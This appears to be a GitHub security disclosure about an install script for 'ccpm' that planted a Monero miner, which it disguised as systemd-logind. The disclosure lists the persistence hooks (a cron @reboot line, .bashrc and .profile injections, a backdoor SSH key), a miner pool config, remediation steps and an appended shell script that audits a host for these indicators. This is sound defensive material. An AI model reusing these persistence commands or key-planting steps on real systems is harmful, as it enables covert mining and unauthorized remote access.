SECURITY: Install script deploys Monero cryptominer and backdoor SSH key #1016

@athompson-hoho

⚠️ Security Disclosure — Cryptominer and SSH Backdoor Installed via ccpm Install Script

Date discovered: 2026-02-22
Install method used: curl -sSL https://automaze.io/ccpm/install | bash

What happened

Running the ccpm install script from automaze.io silently installed a Monero (XMR) cryptominer and added persistence mechanisms across the system without any disclosure or consent.

Malicious payloads installed

| Location | Description |
| --- | --- |
| /home/<user>/moneroocean/xmrig | XMRig Monero miner binary |
| /home/<user>/moneroocean/miner.sh | Launch wrapper script |
| /home/<user>/moneroocean/config_background.json | Miner config — pool: 62.60.246.210:443, user: NEWVPS1 |
| /var/tmp/systemd-logind | Second miner binary disguised as the system's systemd-logind |
| /var/tmp/config.json | Config for the disguised miner |

Persistence mechanisms

The script added four separate persistence hooks to survive reboots and re-logins:

  1. crontab — @reboot cd /var/tmp && nohup ./systemd-logind -c config.json >/dev/null 2>&1 &
  2. ~/.bashrc — Same command injected, runs on every shell open
  3. ~/.profile — Launches moneroocean/miner.sh on every login
  4. ~/.ssh/authorized_keys — An unlabeled SSH public key was added (no comment/owner), enabling persistent remote access by an unknown party:
     ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGdvNKk+q3C/YLcyfnv93Mc5HslWh4XhpHQEzPR4dita

Impact observed

  • ~150% CPU consumed across 3 miner processes
  • ~13 GB RAM consumed (4.5 GB per disguised systemd-logind process)
  • System load average spiked to 49.09 (5-min avg)
  • 1,051 zombie processes accumulated
  • Potential unauthorized SSH access via the injected key

Mining pool details

```json
{
  "url": "62.60.246.210:443",
  "user": "NEWVPS1",
  "algo": "rx/0",
  "nicehash": true,
  "tls": true
}
```

Remediation steps taken

  1. Killed all miner processes
  2. Deleted /home/<user>/moneroocean/ directory
  3. Deleted /var/tmp/systemd-logind and /var/tmp/config.json
  4. Removed @reboot crontab entry
  5. Removed injected lines from ~/.bashrc and ~/.profile
  6. Removed the unlabeled backdoor key from ~/.ssh/authorized_keys

This is a serious supply chain attack. Users who ran the ccpm install script should immediately audit their systems using the above indicators of compromise.

If this was an unintentional inclusion or a compromised CDN/domain, please advise. If this is intentional, this repository should be reported to GitHub Trust & Safety.

/cc @automazeio
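
The following audit helper is an added example, not code from the issue author or from the ccpm project: it checks a host for every indicator listed in the report above (dropped files, the three persistence hooks, the pool address, and the backdoor key) and exits non-zero if any is found. The function name, its three path arguments and the `--run` flag are this example's own; the paths and IoC values are taken from the report.

```shell
#!/bin/sh
# Constructed audit helper (not part of ccpm or the issue): checks a host for the
# indicators listed in the report. Paths and IoC values come from the issue;
# the function name and its arguments are this example's own.
IOC_KEY='AAAAC3NzaC1lZDI1NTE5AAAAIGdvNKk+q3C/YLcyfnv93Mc5HslWh4XhpHQEzPR4dita'
IOC_POOL='62.60.246.210'

# audit_ccpm_iocs HOME_DIR TMP_DIR CRONTAB_DUMP
# Prints one line per indicator found; exit status 0 = clean, 1 = indicators present.
audit_ccpm_iocs() {
  home="$1"; tmp="$2"; cron="$3"; hits=0
  # Dropped files (miner binaries, wrapper script, configs)
  for f in "$home/moneroocean/xmrig" "$home/moneroocean/miner.sh" \
           "$home/moneroocean/config_background.json" \
           "$tmp/systemd-logind" "$tmp/config.json"; do
    if [ -e "$f" ]; then echo "FILE    $f"; hits=$((hits + 1)); fi
  done
  # Persistence hooks: @reboot crontab entry, ~/.bashrc and ~/.profile injections
  for f in "$cron" "$home/.bashrc" "$home/.profile"; do
    if [ -f "$f" ] && grep -qE 'systemd-logind -c config\.json|moneroocean/miner\.sh' "$f"; then
      echo "HOOK    $f"; hits=$((hits + 1))
    fi
  done
  # Backdoor SSH key added to authorized_keys
  if [ -f "$home/.ssh/authorized_keys" ] && grep -qF "$IOC_KEY" "$home/.ssh/authorized_keys"; then
    echo "SSHKEY  $home/.ssh/authorized_keys"; hits=$((hits + 1))
  fi
  # Mining pool address inside any miner config that is present
  for f in "$home/moneroocean/config_background.json" "$tmp/config.json"; do
    if [ -f "$f" ] && grep -qF "$IOC_POOL" "$f"; then
      echo "POOL    $f"; hits=$((hits + 1))
    fi
  done
  [ "$hits" -eq 0 ]
}

# Real run on the current host: sh audit.sh --run
# (the user's crontab is dumped to a temp file so the function only reads files)
if [ "${1:-}" = "--run" ]; then
  cron_dump=$(mktemp)
  crontab -l > "$cron_dump" 2>/dev/null
  audit_ccpm_iocs "$HOME" /var/tmp "$cron_dump"
fi
```

Run it as each user that executed the install script, since the hooks live in that user's home directory and crontab; /var/tmp is shared and only needs one check.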
